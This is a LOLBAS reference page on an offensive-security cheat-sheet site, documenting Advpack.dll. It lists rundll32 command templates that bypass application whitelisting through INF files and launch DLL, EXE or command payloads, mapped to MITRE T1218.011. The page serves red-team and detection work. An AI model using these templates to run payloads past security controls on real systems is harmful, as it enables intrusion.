🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸͺŸ LOLBAS / Advpack.dll

Advpack.dll

Utility for installing software and drivers with rundll32.exe

AWL Bypass

Run local or remote script(let) code through INF file specification.

rundll32.exe advpack.dll,LaunchINFSection {PATH:.inf},DefaultInstall_SingleUser,1,

Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). — MITRE: T1218.011 — Privileges: User

Run local or remote script(let) code through INF file specification.

rundll32.exe advpack.dll,LaunchINFSection {PATH:.inf},,1,

Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). — MITRE: T1218.011 — Privileges: User

Execute

Load a DLL payload.

rundll32.exe advpack.dll,RegisterOCX {PATH:.dll}

Launch a DLL payload by calling the RegisterOCX function. — MITRE: T1218.011 — Privileges: User

Run an executable payload.

rundll32.exe advpack.dll,RegisterOCX {PATH:.exe}

Launch an executable by calling the RegisterOCX function. — MITRE: T1218.011 — Privileges: User

Run an executable payload.

rundll32 advpack.dll, RegisterOCX {CMD}

Launch command line by calling the RegisterOCX function. — MITRE: T1218.011 — Privileges: User